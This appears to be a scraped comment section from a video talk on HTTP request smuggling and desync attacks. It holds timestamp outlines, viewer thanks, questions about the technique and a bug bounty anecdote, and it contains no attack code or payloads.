01:10 interest low stack system/integration/protocol bugs 01:27 agenda 02:04 quick introduction, CL.TE /TE.CL "HTTP Desync Attacks: Smashing into the Cell Next Door " James Kettle, th-cam.com/video/w-eJM2Pc0KI/w-d-xo.html watchfire paper, 2005 shorturl.at/cfstN ====================================== CL.TE Desync Attack ====================================== 03:21 CL.TE which is the front-end.back-end 03:35 the front-end will interpret a web request using its content-type header and the back-end will interpret the same request using the transfer-encoded header 03:51 here we have an attacker, post request, T.E header is malformed 04:18 Back-end ignores the content-length ============================= TE.CL Desync Attack ============================= 05:58 [...] 08:14 testing for request smuggling 08:37 github.com/defparam/smuggler 09:58 Impact radius of request smuggling 10:14 Open Desync, the3 most dangerous of the three 10:28 IP Desync 10:51 Self Desync, VPN, VPS ============================= Practical Attack ============================= 11:20 Recon stories
seeing the view count gives me the warm n fuzzies cus i know im super early to the party you ladies and gents are super rad and i couldnt be more excited to start hunting
14:40 the takeway i love it. i was in talk with a pretty big sec tech company . one of their guys tried to act like a wise guy: there is no risk with a robots.txt. ok sure kiddo.
Hello sir. I have a question I couldn't find how to do that. There are 15 numbers from 1-15. It can generate any number randomly. How can we identify which number is being generated?
in this vulnerability, there is no key different between http and https, but the thing you must looking for is the http version, if it's http/2.0 then you have to try another ways to exploit it by downgrading the http version to 1
Trying to get an absolute in depth understanding of each major vulnerability type, this has helped with my smuggling step
01:10 interest low stack system/integration/protocol bugs 01:27 agenda 02:04 quick introduction, CL.TE /TE.CL "HTTP Desync Attacks: Smashing into the Cell Next Door " James Kettle, th-cam.com/video/w-eJM2Pc0KI/w-d-xo.html watchfire paper, 2005 shorturl.at/cfstN
======================================
CL.TE Desync Attack
======================================
03:21 CL.TE which is the front-end.back-end 03:35 the front-end will interpret a web request using its content-type header and the back-end will interpret the same request using the transfer-encoded header 03:51 here we have an attacker, post request, T.E header is malformed 04:18 Back-end ignores the content-length
=============================
TE.CL Desync Attack
=============================
05:58 [...]
08:14 testing for request smuggling 08:37 github.com/defparam/smuggler
09:58 Impact radius of request smuggling 10:14 Open Desync, the3 most dangerous of the three 10:28 IP Desync 10:51 Self Desync, VPN, VPS
=============================
Practical Attack
=============================
11:20 Recon stories
mind blown! felt sorry for sysadmins for the consequences of his very last attack in this presentation. highly impactful attack indeed.
Wem
@@chasejensen88 one year later )
Exactly what I need. Impressive stuff!
The stuff is really great. Thanks a lot !!
Thank you for sharing.One of great teaching class i ever had.
Cool PoC, Great session on HTTP smuggling attack.
seeing the view count gives me the warm n fuzzies cus i know im super early to the party
you ladies and gents are super rad and i couldnt be more excited to start hunting
18:48 recon story#2 is about api.zomato.com🕵️ got a bounty of. 15k USD
The last one was mind blowing
Does HTTP Request smuggling, just works on POST method, or also on GET ? I have heard it just works on POST method..
Is their github page for the test server , I wanna test my self
14:40 the takeway i love it. i was in talk with a pretty big sec tech company . one of their guys tried to act like a wise guy: there is no risk with a robots.txt. ok sure kiddo.
Hello sir. I have a question I couldn't find how to do that. There are 15 numbers from 1-15. It can generate any number randomly. How can we identify which number is being generated?
Hi Nahamsec,
Can you share the lab so I can practice?
This was trooly amayzing
Amazing stuff ! thanks a lot
Thanks
Thank you
I needed this.
This was fascinating!
Amazing stuff
Thankyou!
Why don't you ppl invite ippsec
how attacker poisoing the HTTP, but Victim access on HTTPS ?
can it's still work ? or not? if work, how?
in this vulnerability, there is no key different between http and https, but the thing you must looking for is the http version, if it's http/2.0 then you have to try another ways to exploit it by downgrading the http version to 1
@@omarataallah9451 ouh thats about http version not http / https ? am i right?
@@hidayatbachtar true
This is GOLD!
wow amazing
Tcm hair 😂